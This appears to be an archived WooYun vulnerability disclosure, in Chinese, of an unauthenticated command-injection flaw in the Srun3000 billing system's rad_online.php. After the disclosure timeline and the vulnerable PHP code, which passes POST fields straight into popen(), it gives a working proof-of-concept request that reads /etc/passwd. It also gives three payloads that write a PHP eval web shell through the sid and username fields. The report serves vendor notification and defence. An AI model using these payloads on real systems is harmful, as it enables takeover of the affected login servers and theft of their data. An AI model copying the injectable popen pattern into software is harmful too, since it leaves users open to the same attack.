乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-05-25: 细节已通知厂商并且等待厂商处理中 2014-05-29: 厂商已经确认,细节仅向厂商公开 2014-06-01: 细节向第三方安全合作伙伴开放 2014-07-23: 细节向核心白帽子及相关领域专家公开 2014-08-02: 细节向普通白帽子公开 2014-08-12: 细节向实习白帽子公开 2014-08-23: 细节向公众公开
Srun3000计费系统无限制任意命令执行getshell
文件:/en_us/rad_online.phpsrun3/web/online.php 4-76行srun3/web/rad_online.php 4-76行
if($_POST["action"]=="dm"){ $cmd = "/srun3/bin/rad_drop -sdm ".$_POST["sid"]; if($fp=popen($cmd, "r")) { $con = fread($fp, 128); pclose($fp); } $con = str_replace( "\n", " ", $con); echo $con; exit;}else if($_POST["action"]=="dm1"){ $cmd = "/srun3/bin/rad_drop -sdm ".$_POST["sid"]; if($fp=popen($cmd, "r")) { $con = fread($fp, 128); pclose($fp); } $con = str_replace( "\n", " ", $con); if(strstr($con, "1")) { $cmd = "/srun3/bin/set_user mac_auth ".$_POST["username"]." ".$_POST["mac"]." stop"; if($fp=popen($cmd, "r")) { //$con = fread($fp, 128); pclose($fp); } } echo $con; exit;}$username=trim($_POST["username"]);$password=trim($_POST["password"]);//echo $username.",".$password;//校验用户if($username != "" && $password != ""){ $cmd = "/srun3/bin/show_user ".$username. "|grep user_password_ori"; echo $username; if($fp=popen($cmd, "r")) { $con = fread($fp, 128); pclose($fp); if($con == "") { echo "用户不存在!"; } $con = substr($con, 19); if($password."\n" != $con) { echo "密码错误"; exit; } else { $cmd = "/srun3/bin/online_user -r -u ".$username; if($fp=popen($cmd, "r")) { $con = fread($fp, 2048); pclose($fp); //echo $con; } $arr = explode("\n", $con); } } else { exit; }}
poc:
POST /rad_online.php HTTP/1.1Host: login.***.edu.cnProxy-Connection: keep-aliveContent-Length: 52Cache-Control: max-age=0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Origin: http://login.***.edu.cnUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36Content-Type: application/x-www-form-urlencodedDNT: 1Referer: http://login.***.edu.cn/Accept-Encoding: gzip,deflate,sdchAccept-Language: zh-CN,zh;q=0.8,en;q=0.6action=dm&sid=1|cat /etc/passwd > /srun3/web/f.txt
sid、username、mac都存在命令执行漏洞getshell1:
action=dm&sid=1||echo "<?php eval(\$_POST[cmd]);?>" > /srun3/web/s.php
getshell2:
action=dm1&sid=1||echo "<?php eval(\$_POST[cmd]);?>" > /srun3/web/s.php
getshell3:
username=1|echo "<?php eval(\$_POST[cmd]);?>" > /srun3/web/s.php&password=123
危害等级:中
漏洞Rank:8
确认时间:2014-05-29 09:33
14.12 版本注入漏洞,14.17.12 已经修正,等待用户升级
暂无